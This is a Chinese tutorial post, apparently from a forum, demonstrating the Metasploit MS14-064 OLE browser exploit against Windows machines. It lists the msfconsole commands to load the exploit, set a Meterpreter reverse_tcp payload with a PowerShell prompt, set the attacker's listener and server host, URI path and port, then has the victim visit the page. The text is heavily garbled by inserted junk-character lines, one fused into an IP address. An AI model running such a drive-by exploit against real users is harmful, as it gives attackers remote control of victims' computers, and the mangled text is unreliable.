. H8 j* G4 s- z) M: I* L
我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示
! b0 P5 u' b' k# R ]6 Y; d
" f( y$ l9 {( x* H4 t4 v1 E9 |
) C8 {9 k0 k; N- M0 R# {
开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图:
3 [: |3 j: f9 w' r- ^
& ], Z f* B5 v- l9 M' K9 f: H5 B+ u; W' c9 z4 g/ W" A
然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp
5 ^" k9 X1 C, n0 ^% N6 e9 C) N ~8 [
) r [- U. |/ A) X+ f" F z8 R% [* w ]" p1 o# m- z A/ a, c
set AllowPowershellPrompt true
" w% n$ X# `) E" A' ?, h) V
3 m" V& @6 q- M& u$ V( ]
4 l% f' \2 j/ k
Set LHOST 192.168.0.109
1 G3 }2 O1 Y7 Q( V) D
$ y- P8 n: `3 e- A+ Y) [6 H: K- u/ F( n4 M; L: Q5 g# g
set SRVHOST 192.168.0.1095 ?, w9 I. N. s) G$ J5 [
- d5 A4 Y4 |0 f t6 [
- [$ ], M0 d: S4 C. J
Set uripath share3 l& d) k' h1 t* {
3 s# l& Z4 q3 y$ P& P9 e& S% e; a
& W4 m3 g6 M+ ^3 `2 ^! c1 b" V' K/ E Set srvport 80& x8 {4 [) h) Z7 ~
" |( g9 N! I3 \: {4 r
7 Y9 d z3 E; X0 \- B$ g
j {; U/ e3 V+ l" ^
. s! l5 ]" @, l! L' v0 w9 }5 o$ ?3 O8 U$ n
$ ^0 O# [* R/ B9 p( x
, G9 Y3 o6 f$ I
4 K$ \) \- Q0 @! p9 P" D6 {
. Z r( C6 p) f0 |% s% C/ Y
4 N& Y1 z4 l; w; y& O _) @0 G
/ {! \1 k3 X3 S( W7 ~
! f# ?# |+ T, Q0 u/ {
# e: @' r8 D' b0 a) g3 h7 x* z1 X+ V! q" r
5 M1 K2 _* y3 J5 F) A/ e2 Y/ R
% _2 i1 D& _7 b# R. R9 C
! b/ F5 X9 i! ?2 k# ~
下面我们来访问本地地址如图:' r) {6 O) j) X
: \- U2 S+ s9 g% |( f" J6 j0 w2 b! N
- j; q9 j6 y G6 ~2 i8 m9 e' W
% C* z+ D# h9 R0 ^, f) L% @
) K' H/ z0 ^& B( \; ~; o# V( p
/ \ c0 o7 O4 X
1 Y0 I; i, V2 L( t" v9 i' L, l
& H1 \: [3 R' ]4 R
' W) k, N- W4 H3 V. e# e# K
' ^4 R# \& i( o1 d. k) V( n